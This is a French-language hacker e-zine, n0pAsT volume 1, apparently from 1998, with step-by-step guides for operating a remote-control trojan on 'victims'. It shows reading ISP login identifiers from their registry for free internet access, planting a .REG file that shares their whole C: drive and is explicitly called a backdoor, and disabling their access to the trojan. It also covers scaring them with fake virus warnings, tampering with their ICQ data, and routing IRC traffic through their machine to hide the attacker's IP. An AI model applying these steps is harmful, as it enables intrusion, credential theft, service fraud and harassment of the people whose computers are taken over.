Copy Link
Add to Bookmark
Report

n0pAsT Vol 1

eZine's profile picture
Published in 
n0pAsT
 · 11 Oct 2020

  

___ _ ___
| _/ ____// _ ____ ___________ __________ ____ \_ |
|| __ ___/ ___\ | |__ / __ \ /____ ___ \/ ___ ___\_ / __ \ _ __ __ ||
|| | \ | || | //||| __\ | | | |/ __/| | |/\| | |/ __/| | ||| |/ |/ | ||
|| | \| || |// ||| | \|| |##| |\__ \| | | || _| | |##||| | | | ||
|| | |\___|| |/__||| |__/||_| |_|/___/|_| |_||___\|_| |\|__/|__/| | ||
|| |/ \____/ | __/ \/ \| ||
|| // |_| _____________ ||
||_ \| .,:;> mAdE By <;:,. _||
|__\ / \ /__|
/ *MiSt0 \
________________________________________/ *fuLg0r \_____________________________________
¢£¤¥ ¦§¨©ª«¬-®¯°±²³´µ·¸¹º»¿øØÞþæ¡¢£¤¥ ¦/ *ToBoZo \§¨©ª«¬-®¯°±²³´µ·¸¹º»¿øØÞþæ¡¢£¤¥ ¦§¨
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯/ *Backflip \¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
/ *Lord Nanard \
/ *Natural Killer \
--------8<----+-----8<---------8<---------8<--+-------8<---
/____________.....____________\

____________________________________________________________________________
_____________ / TabLe des mAtières : Auteur
/ñØÞÄ$T E-zîÑè\ |¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
] -=v0L 1=- [ | [1]n0pAsT....f0ndAti0n.....!) ++nk
\ >JuiLLet 98 / | [2]Disclaimer ++nk
¯¯¯¯¯¯¯¯¯¯¯¯¯ | [3]Exploits sur base de ReGistre ++nk & Nanard
| [4]iNF0NiE BEsT 0f hACk ++nk
| [5]Le mail sous TeLneT (An0nYm0uS) Nanard
| [6]Sp00fing Nanard
| [7]Etre ou ne plus être.... Backflip
| [8]Les recettes de tonton Mist0 Mist0
| [9]Introduction a l'émuLation fuLg0r
|
---------8<------+--------------8<---------------------8<---------------------8<---------------
¦
:
.
_ _______________________________________ _
`^°*;:,.> f 0 N D A T i 0 N d E n 0 p A s T <.,:;*°^`
___________________________/¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\____________________________
I
Pourquoi n0pAsT ? ....pff con cette question ....bah paskon est tous de passé différents et kon
va essayer de s'unir ..., Paske le fUtuR est devant nous :), pasken haCk comme en autre chose,
tout evolue ...et on dois chaque jour utiliser de nouvelles armes, de nouvelles techniks...
(et pis ....ptet kon a l'ambition de devenir le fUtuR du H@Ck fRanCopHoNe......;)
La creation du groupe s'est faite sur un coup de tête de certains des membres actuels.....le
ras le bol des groupes ki se prennent pour des boss alors ki valent pas grand chose ....nous
on pretend en rien, on ne vous dit pa kon est le meilleur ...mais tout ce kon sais C kon veux
faire AVANCER LE CHMILBLIK !!!! alors.....n0pAsT RuLezzzZZZZZZZZ ;)
Cet E-ziNe (ke vous attendiez tous !) est le premier volume d'une LooooOOOOOOngue serie...
iL abordera des sujet tels ke ...la teck, le hack, phreak, l'emulation, recettes de
cuisines...:)~ de l'uNdErGr0uNd....de la vie, de mon chat, ma copine, mon ordi, celui
d'mes potes, le clebard de ma voisine, les morbaks des DWF....(#pRiVaTe j0kE#)
...alors bOnne Lecture ....et rendez vous dans le prochain numero !!!

"Bref, c'est un journal qui est fait par l'Underground POUR l'underground."
++neurAlien
.....merci neur...(c mon idRôle ;)

_ _______________________ _
`^°*;:,.> Ð ï $ © £ Å ï M Ê ® <.,:;*°^`
__________________________________/¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\__________________________________
II
Euh .....(chu ému..)...b0n !!!
Certaines informations contenue dans ces textes peuvent êtres interdites dans certains pays
(....pas d'chance !) dans le cas ou vous ne savez rien de la législation de votre pays ......
Bah ...on peut pas vous aider paske nous non plus ;)...sinon, renseignez vous afin de savoir si
oui ou *** (decryptez l'pass ....mouarf :) vous avez le droit de posseder et de lire ces
documents. Ces informations sont données a titres PUREMENT EDUCATIF !!! (ok les momes ?;)
Les auteurs, producteurs ne peuvent en aucun cas être rendu responsable de l'application de
certain de ces ecrits.
Et pis si ca vous plait pas ALLEZ LIRE AUTRE CHOSE !!! (on vous lora assez dit ...;)

_ ________________________________________________ _
`^°*;:,.> EXPL0iTS SUR LE PiRATAGE DE BASE DE REGiSTRE <.,:;*°^`
____________________/¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\_______________________
III

Bon ! Salut les neuneu !!
Nan, nan vous KC pas deja ..CT juste histoire de cette mettre dans le move....
Bon cette article comme il est indiquer au dessus est censé vous expliker un peut le principe
du piratage d'une base de registre (BDR) windows .....tfacon ....yen a kasiment ke sous windaube
Et la j'entends deja les remarques a 2 balles du style :
" a quoi ca sert puiskon y a jamais acces ?!"
Mais si vous y avez acces .....ne serait ce qu'avec le control de sockets....
C un exemple parmis d'autres !! Vous dites pas ke ya ke ce moyen pour y acceder
(mais si mais si reflechissez un peu...)
Bon ....on va voir le cas du controle de sockets dans un premier lieux (puiske vous vous en
servez jamais) et on verra le cas general au travers, vous me suivez ? nan ? c pas grave,
fallais suivre...L).
POur ce qui est du control, je vous passerais nanard ...y vous a fait des BO dessins ....
(faites gaffe....il est po du genre a leziner ...il attaque direct...). Mais avant tout une
petite intro :).

.,:;> INTRO <;:,.
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
" D'abord, pk il ya une base de registre ? "
Le principe est simple :
PLus on ajoute de composants a un system, plus il deviens difficile de s'occupper du system,
de l'entretenir....et plus il devient dur d'ajouter correctements de nouveaux elements. Bon,
imaginez l'immensité du nombre de peripheriques ke l' OS doit être en mesure de reconnaitre,
et donc par conscequent l'immensité du nombre de pilote qu'il est senser pouvoir charger....
sans oublier qu'il dois faire communiquer les applications avec ces peripheriques et que ces
applications communiques egalement entre elles !!! (les API ...).....vous realisez maintenant
le rôle de la Base de Registre ? (si Non ...remontez de 3 lignes LOL !)
Pour l'historique, sachez juste qu'a l'origine cette tache etait remplie par les fichiers
dont l'extention est .ini , ces fichiers sont encore present dans windows....car les programmeurs
ont pris l'habitude de gerer leurs applications grace a ces fichiers (malgres les requetes de
Kro$oft a ce sujet....). Mais en theorie, la base de registre est sensée pouvoir gérer a elle
seule tous les evênements du system d'exploitation ...et C en cela qu'elle est interressante :
c'est qu'elle en gere deja une enorme partie %)
Bon, assez de blabla !!! Je vous passe Nanard pour la pratique !)
++nk

=====> Je prend la main $)

Ok...bon...lorsque vous cliquer sur l'option B.D.du control , vous voyez apparaitre une fenetre avec des
options inconnues selon votre degré d'utilisateur Windows. Vous me direz " a quoi ca sert?
qu'est ce que j'en ai a foutre puisque je peux aller sur le HD du gars?"
Ok vous avez raison mais
vous oubliez que la base de registre renferme des secrets que le disque dur ne peux reveler...
exple: le nom de famille du gars. Cela peut aussi vous eviter les longs temps d'acces du disque
dur. Et vous pouvez vous amusez a personnaliser l'environnement de votre victime...

.,:;Exemple;:,.
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯

Lorsque vous etes connectés a votre victime, si vous voulez vous connecter a internet gratuitement, vous prenez le fichier
infonie.ini qui se trouve dans c:\windows\. Ok? Mais le temps d'afficher le repertoire complet
est long et inutile puisqu'il vous faut seulement une information: le n° abonnement de la 1ere
ligne du fichier. Avec la base de registre, il y 2 lignes a taper et vous avez immediatement
ce n° abonnement.

la clé complete ou se trouve ce n° est: HKEY_USERS\.Default\RemoteAccess\Profile\Infonie

1) cocher HKEY_USERS (voir schema ci-dessous)
2) Placer la suite de la clé dans l'emplacement "Clé" : .Default\RemoteAccess\Profile\Infonie
3) Taper dans la case "Nom" : User
4) Presser le bouton "Lire"
5) Dans la fenetre en dessous doit s'afficher le n° de connexion (voir schema)

.,:;SCHEMA;:,.
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯

|¯¯Clé racine ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯|
| ( )HKEY_CLASSES_ROOT (x) HKEY_USERS |
| ( )HKEY_CURRENT_USER ( ) HKEY_CURRENT_CONFIG |
| ( )HKEY_LOCAL_MACHINE ( ) HKEY_DYN_DATA |
|____________________________________________________|

|¯¯ Style (et non, pas d'hexa): ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯|
| (x) Style Chaine ( ) Style Entier |
|____________________________________________________|

|¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯|
Clé: |.Default\RemoteAccess\Profile\Infonie |
|____________________________________________|

|¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯|
Nom: |User |
|____________________________________________|

|¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯|
Valeur: | |
|____________________________________________|

Lire Ecrire
______________________________________________________
| Remote > VALEUR: inf1/199717831785114@infonie.fr | <== excellent, non?
| |
| |
| |
|____________________________________________________|


Autres Utilités
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯

Maintenant que vous avez compris comment ca fonctionnait, je vais vous donner d'autres clés.



_________________________________________________
> Pour avoir le numero d'abonnement son wanadoo <
/¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\___________________________________________________________


1) cochez: HKEY_USERS
2) mettez dans "Clé" : .Default\RemoteAccess\Profile\wanadoo
3) taper dans "Nom": User
4) Cliquer sur Lire
5) Il vous reste plus qu'a trouver le password :o(

_________________________________________________
> Pour avoir le numero d'abonnement son infonie <
/¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\___________________________________________________________
....bah alors nanard ....on oublie infonie ?
1> cochez la Clé racine : HKEY_USERS
2> rentrez la Clé : .Default\RemoteAccess\Profile\infonie
3> taper "Nom": User
et voila, le travail est fait !!! Pour vous connecter, il ne vous reste plus qu'a creer une
nouvelle connection avec comme Nom la chaine de caractere ke vous aurez trouver dans la BDR
soit : inf1/[numero d'abonnement]@infonie.fr

POur information, le numero d'abonnement commence toujours par l'année ou celui ci a debuter
-=> Astuce <=-
Si vous possèdez l' IP de la victime, mais pas son Host ....et que vous voulez determiner si
votre victime est sous infonie, sachez que le rezo d'infonie comporte une adresse IP de classe B
...donc toutes les IP des infoniens commencent par le meme enchainement de 6 chiffres qui est :
195.242
Les IP des infoniens sont donc du type : 195.242.XXX.XXX

....bon je vous repasse nanard ....@)
++nk...|aLiEn|
_____________________________________________
> Changer la license windaube de sa victime <
/¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\___________________________________________________________

Vous pouvez connaitre & changer le NOM de FAMILLE, l'Organisation, et le n° de licence OEM
du Windows de votre victime:

1) cocher: HKEY_LOCAL_MACHINE
2) tapez dans "Clé": SOFTWARE\Microsoft\Windows\CurrentVersion
3) tapez dans "Nom": RegisteredOwner
4) Cliquez sur Lire pour connaitre le VRAI nom de la victime :-)
5) mettez dans "Valeur" le nom que vous voulez mettre a la place (le votre par exemple)
6) cliquer sur "Ecrire"
7) Un message suivant doit apparaitre:

Remote > VALEUR ECRITE AVEC SUCCES.

Autres possibilités de la phase 3)

3) tapez dans "Nom": RegisteredOrganization <== Organisation de la victime
3) tapez dans "Nom": ProductId <== n° de licence OEM de Windows
3) tapez dans "Nom": Version <== Version de l'O.S. (exple: Windows) mettez: Windobe :)

________________________________________________
> Changer le nom de l'ordinateur de sa victime <
/¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\___________________________________________________________

Il peut etre amusant de changer ce nom pour mettre votre pseudo a la place :o)

1) cocher: HKEY_LOCAL_MACHINE
2) tapez dans "Clé": System\CurrentControlSet\control\ComputerName\ComputerName
3) tapez dans "Nom": ComputerName
4) Cliquez sur Lire
5) mettez dans "Valeur" le nom que vous voulez mettre a la place
6) cliquer sur "Ecrire"


____________________________________________________________
> Désactiver le password valide du Sockets23 de la victime <
/¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\___________________________________________________________

En supprimant ce password, la victime n'aura plus l'acces à son controle.

1) cocher: HKEY_USERS
2) taper dans "Clé": .Default\Software\Soquets3
3) taper dans "Nom": Passworld
4) Cliquer sur Lire. Normalement doit apparaitre: REMOTE > VALEUR: OK
5) taper dans "Valeur": WRONG
6) Cliquer sur "Ecrire"

_______________________________________
> Changer le nom reseau de sa victime <
/¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\___________________________________________________________

1) cocher: HKEY_LOCAL_MACHINE
2) taper dans "Clé": Network\Logon
3) taper dans "Nom": username
4) Cliquer sur Lire pour voir son nom
5) taper dans "Valeur" un nom au choix
6) Cliquer sur "Ecrire"

Lorsque vous faites NBTSTAT -A IP_VICTIME, vous voyez apparaitre un nom. Vous pouvez le modifier.
Ces informations sont visibles a partir du panneau de configuration, dans les parametres RESEAU
puis dans "IDENTIFICATION". Mais vous pouvez aussi changez celles de votre victime.

Clé complete: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\VNETSUP
¯¯¯¯¯¯¯¯¯¯¯¯¯
1) cocher: HKEY_LOCAL_MACHINE
2) taper dans "Clé": System\CurrentControlSet\Services\VxD\VNETSUP
3a) taper dans "Nom": ComputerName
3b)taper dans "Nom": Comment
3c)taper dans "Nom":Workgroup
4a) Cliquer sur Lire pour voir le nom du pc de la victime
4b) Cliquer sur Lire pour voir le commentaire a propos du PC
4c) Cliquer sur Lire pour connaitre le groupe auquel appartient la victime
5a) taper dans "Valeur" un autre nom... (exple: Mickey)
5b) taper dans "Valeur" un commentaire a votre gout
5c) taper dans "Valeur" un autre groupe... (exple: Disney World)
6) Cliquer sur "Ecrire"

Votre victime n'a pas activer le PARTAGE DE FICHIERS ET IMPRIMANTE ?? Faites le vous meme!
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯

1) cocher: HKEY_LOCAL_MACHINE
2) taper dans "Clé": System\CurrentControlSet\Services\VxD\VNETSUP
3a) taper dans "Nom": FileSharing
3b) taper dans "Nom": PrintSharing
4a) taper dans "Valeur": Yes
4b) taper dans "Valeur": Yes
5) Cliquer sur "Ecrire"


___________________________________________
> Partager le disque dur de votre victime <
/¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\___________________________________________________________

Tout d'abord, il faut que l'etape precedente soit effectuée ou que la victime ai deja
des repertoires partagés. Mais peut-etre qu'il ne vous interesse pas... Ok, Allons partager
le disque dur totalement :o) (ca va etre long)

clé complete: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\WIN95
¯¯¯¯¯¯¯¯¯¯¯¯¯

1) cocher: HKEY_LOCAL_MACHINE
2) taper dans "Clé": SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\WIN95
3) IMPORTANT: COCHER "STYLE ENTIER"
3) taper dans "Nom":
a) Flags
b) Type
c) Parm2enc
d) Parm1enc
4) taper dans "valeur"
a)257
b)0
c)laisser le champs vide
d)laisser le champs vide
5) COCHER: "STYLE CHAINE"
6) taper dans "Nom":
a) Path
b) Remark
7) taper dans "valeur"
a)C:\ <==== ca signifie que C:\ sera partagé
b)mon disque dur <==== le commentaire


En théorie cette technique devrait marcher. Mais je ne l'ai pas encore testé. Faites moi part
de vos commentaires.

Vous pouvez egalement créer un fichier chez vous, puis l'uploader sur le disque de la victime
puis l'executer. Créer le fichier PARTAGE.REG faites un clique droit dessus puis EDITION.


___________________________________
-=> Contenu du fichier PARATAGE.REG <=-
--------------8<------------------Cut-Here------------------8<--------------------------------8<--
REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\C]
"Flags"=dword:00000101
"Type"=dword:00000000
"Path"="C:\\"
"Parm2enc"=hex:
"Parm1enc"=hex:
"Remark"="mon disque C"
--------------8<------------------Cut-Here------------------8<--------------------------------8<--

la valeur "C:\\" est normal. laisser comme tel. Cette methode est beaucoup plus simple et
beaucoup plus fiable. je vous conseille de créer ce fichier a l'avance chez vous pour vos
prochaines visites chez vos victimes. Ceci est une "backdoor".

______________________________________________________
> Créer un message d'alerte au demarrage de windaube <
/¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\___________________________________________________________

Il peut etre amusant de faire PEUR a sa victime en créant une fenetre qui apparaitra a chaque
démarrage de Win95.

clé complete: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon
¯¯¯¯¯¯¯¯¯¯¯¯¯

1) cocher: HKEY_LOCAL_MACHINE
2) taper dans "Clé": SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon
3) taper dans "Nom": LegalNoticeCaption
4) taper dans "Valeur" le nom de la fenetre qui sera créé a chaque démarrage de win
6) Cliquer sur "Ecrire"
7) taper dans "Nom": LegalNoticeText
8) taper dans "valeur" le message contenu dans la fenetre qui sera créé a chaque démarrage de win
9) Cliquer sur "Ecrire"
10) Faite rebooter votre victime pour que les changements prennent effet.
______________________
-=> Exemple de fenetre <=-
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
NK : Vous pourrez trouver un exemple de ce type en executant le fichier WINLOGON.REG
______________________________
| Virus detecté | <---* LegalNoticeCaption
|_____________________________|
| Windows vient de detecter |
| un virus. Veuiller eteindre | <---* LegalNoticeText
| Votre ordinateur. |
|_____________________________|

_________________________________________________________________
> Modifier le nom par defaut de l'ouverture des session windows <
/¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\___________________________________________________________

Lorsque que Windows redémarre, il vous demande votre pseudo et votre mot de pass de session.
En général, Windows conserve le dernier login de votre derniere session. (c'est tout le temps
le meme quoi). Cependant, vous pouvez le changer en mettant le votre. La victime sera tres surprise.
Je vous le garanti :o)

Clé complete: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

1) cocher: HKEY_LOCAL_MACHINE
2) taper dans "Clé": SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon
3) taper dans "Nom": DefaultUserName
4) Cliquer sur Lire pour voir son login d'ouverture de windoze
5) taper dans "Valeur" un nom au choix
6) Cliquer sur "Ecrire"

_________________________________
> Modifier le UIN de sa victime < -=>nécessite la connaissance de celui ci...
/¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\___________________________________________________________

111111: UIN de la victime
Clé complete: HKEY_CURRENT_USERS\Software\Mirabilis\ICQ\Owners\1111111

1) cocher: HKEY_CURRENT_USERS
2) taper dans "Clé": Software\Mirabilis\ICQ\Owners\1111111
3) taper dans "Nom": Name
4) Cliquer sur "Lire" pour voir le pseudo utilisé dans ICQ de la victime
5) taper dans "Valeur" un nom au choix
6) Cliquer sur "Ecrire"

Changer les préférences:

1) cocher: HKEY_CURRENT_USERS
2) taper dans "Clé": Software\Mirabilis\ICQ\Owners\1111111\Prefs
3a) taper dans "Nom": Random Comment
3b) taper dans "Nom": Random Name
4a) Cliquer sur "Lire" pour voir le message libre mis dans ses infos
4b) Cliquer sur "Lire" pour voir son nom
5a) taper dans "Valeur" un message plus approprié a vos désirs :o)
5b) taper dans "Valeur" un nom plus marrant ... :o))
6) Cliquer sur "Ecrire"


_______________________________________________
> Si la victime est sous NT comment on fait ? <
/¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\___________________________________________________________

Si la victime est sous Windows NT, les clés sont les memes... il faut seulement changer la clé
lorsque le mot Windows est dedand. Exemple:

Clé sous Windows95/98: SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon
Clé Sous Windows NT : SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯

Bon....si vous avez a peut pret suivit nanard ...vous avez du comprendre que la base de
registre se presente sous la forme d'une gigantesque arborescence composée de Clé racines :

|¯¯Clé racine ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯|
| ( )HKEY_CLASSES_ROOT ( ) HKEY_USERS |
| ( )HKEY_CURRENT_USER ( ) HKEY_CURRENT_CONFIG |
| ( )HKEY_LOCAL_MACHINE ( ) HKEY_DYN_DATA |
|____________________________________________________|

Chacunes de ces clés racines etant composées de sous clé.....contenant des chaînes....qui
contiennent elles memes des données de valeurs.....le boxon vous allez me dire ...@)
BAH NAN !!! C comme ca que C le mieux organiser .......enfin ....C toujours du Kr0$0fT.....!)
++nk

_ _______________________________________ _
`^°*;:,.> i N f 0 N i E B e S T 0f h A C k <.,:;*°^`
___________________________/¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\____________________________
IV
______________________________
> iNf0NiE : cArAcTeRiStiQuEs <
/¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\_________________________________________________________________

- sAns doute le pRovider le plus fAcile a pirater au monde
- sAns doute le pRovider le plus cher du m0nde
- ....sAns doute le pRovider le plus rapide de fRance
- ....sAns doute le pRovider possedant les oPerateur les plus kEwL du m0nde ...f0panié....
- Euh.......sAns doute v0tre prochain pRovider....hihi @)

______________________________
> hAcK d'iNf0NiE, hisToRiK <
/¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\_________________________________________________________________
Bon voila, deja je previens les c.... ki ont des prejugés ....je V pas vous refiler l'astuce
ancestrale du pass: OMNAMAHA, paske d'abord G autre chose a foutre ke de raconter les hack des
autres (le prenez pas mal, je deconne...) mais aussi paske cet exploit ne marche plus .
Mon astuce est maintenant je pense assez connue ( G filer le truc a plein de monde ) alors
n'allez pas me raconter ke C vous ki l'avez trouver ...!°) Bon assez de blabla, je passe a
l'historique !!!
En son temp (a l'epoque ou infonie n'etait pas tres connus), je possedait un abonnement infonie
et je me debrouillait pour choper des abonnement de 6 mois ....Lorsqu'un jour, infonie sort les kits
d'abonnement ! Vous savez, ces CD a 2 balles kon vous file dans tous les magazines info...
Je pris donc un kit d'abonnement ke j'avais degoter chai+ou et je lance L'installation...
-=> et la surprise !!!
au premier lancement d'infonie, une connection est lancée vers un numero en 01 afin d'enregistrer
les parametres sur l'utilisateur (ou est ton fLouZe....ou taBite ...n0m, fo numero de tel ;...)
-=> et la le declic !!!
je minimise la fenetre de merde d'infonie et je lance mon bUtineur ...configuration ....proxy
choix du proxy .....: (tps court de reflexion) proxy.infonie.fr ....port 8080

CA MARCHE !!! ( normal c de mouA hihi $)

En somme le server ki faisait office de server d'enregistrement des nouveau abonnés etait egalement
un serveur de connection des abonnés ...
faites une verification : Les numeros des points de connection sont dans le fichier



_ _________________________________ _
`^°*;:,.> s p 0 0 f e r s u r I R C <.,:;*°^`
___________________________/¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\__________________________________
V


.,:;> INTRO <;:,.
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
C'est bien marrant de se balader sur les HD des mecs avec le socket; mais on s'en lasse vite.
Il existe des outils que personne utilise et qui pourtant sont tres interessants. En effet,
le socket intègre une partie "Client" qui permet d'utiliser l'IP de la victime pour des
programmes utilisant le TCP. l'exemple le plus explicite est l'IRC.
__________
.,:;> eXeMpLes <;:,. _/hiGh gReTz\_
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ [spEciAL tHanKs]
______________________________ ¯>t0 JC'ziC<¯
> eN pAssAnT pAr cHeZ JC'ziC < ¯¯¯¯¯¯¯¯¯¯¯¯
/¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\_________________________________________________________________

Qui n'a jamais voulu avoir l'IP de quelqu'un d'autre sur IRC et donc de faire ce qui lui plait en toute
impunité? C'est facile avec le control de J.C.

1) tu te connectes comme d'hab sur la victime.
2) tu cliques sur "client"
3) tu ecris l'hote sur laquelle tu veux te connecter en spoofant. ex: uk.undernet.org
4) En dessous, tu écris le port du serveur. ex: 6667
5) Tu appuies sur OK.
6) Tu lances ton prog mIRC.
7) Tu tapes dans la fenetre status: /server 127.0.0.1
8) Ca y'est, t'es connecté avec l'IP de ta victime.


Voila un exemple de ce qui doit s'afficher dans la fenetre CLIENT du socket2.3 une fois
que vous etes connectés sur IRC via une IP hackée.


Plug-in connecté, connection du client distant.....

-<< OK client fermé >>-
-<< OK : scan de l'host/IP maintenant >>-
-<< OK (scan ok) = connection... >>-
-<< OK : vous êtes connecté ! >>-
-<< OK (envoie de sockets) >>-
PING :1739703711-<< OK (envoie de sockets) >>-
-<< OK (envoie de sockets) >>-
Running on ports 6666

HELP:London.UK.eu.Undernet.org 372 MYSTED :-
For general IRC help: /join #help or email help@undernet.org:London.UK.eu.Undernet.org 372 MYSTED :-
For questions regarding THIS server, email uk-opers@nildram.co.uk:London.UK.eu.Undernet.org 372
MYSTED :- :London.UK.eu.Undernet.org 372 MYSTED :- GETTING STARTED:London.UK.eu.Undernet.org 372
MYSTED :- Good channels to check out: #friendly, #chat, #newbies, #userguide:Lo
ndon.UK.eu.Undernet.org 372 MYSTED :- :London.UK.eu.Undernet.org 372 MYSTED :-
A WORD FROM OUR SPONSORS...:London.UK.eu.Undernet.org 372 MYSTED :-
This server is provided by Nildram Ltd, Britain's best ISP for IRC:London.UK.eu.Undernet.org 372 MYSTED
:- and Quake! http://www.nildram.net/:London.UK.eu.Undernet.org 376 MYSTED :End of /MOTD command.-<< OK (envoie de sockets) >>-
:London.UK.eu.Undernet.org 303 MYSTED :-<< OK (envoie de sockets) >>-
:MYSTED!~daelin@bjn8-240.abo.wanadoo.fr JOIN :#sIRC:London.UK.eu.Undernet.org 332
MYSTED #sIRC :Bientôt, une méga page IRC...
En construction->Http://www.QuebecIRC.com (Http://www.scriptfr.com):London.UK.eu.Undernet.org 333 MYSTED
#sIRC W 900207356:London.UK.eu.Undernet.org 353 MYSTED @
#sIRC :MYSTED oneil- FardocheX Lilith OrAnGe michael-2 DaRkMaX +W|ndEartH @W @Spiroub0t }{Ead :London.UK.eu.Undernet.org 366 MYSTED
#sIRC :End of /NAMES list.:MYSTED!~daelin@bjn8-240.abo.wanadoo.fr JOIN :#sIRC-<< OK (envoie de sockets) >>-
:London.UK.eu.Undernet.org 324 MYSTED #sIRC +stnl 69:London.UK.eu.Undernet.org 329 MYSTED
#sIRC 896447441:oneil-!the-best@ras4-11.bbsi.net PART #sIRC-<< OK (envoie de sockets) >>-
:MYSTED!~daelin@bjn8-240.abo.wanadoo.fr NICK :Nanard-<< OK (envoie de sockets) >>-
:Nanard!~daelin@bjn8-240.abo.wanadoo.fr PART #sIRC-<< OK (envoie de sockets) >>-


Voila c'est tout pour cette fois. Les possibilités sont infinies! Tu peux spoofer sur n'importe quelle machine.
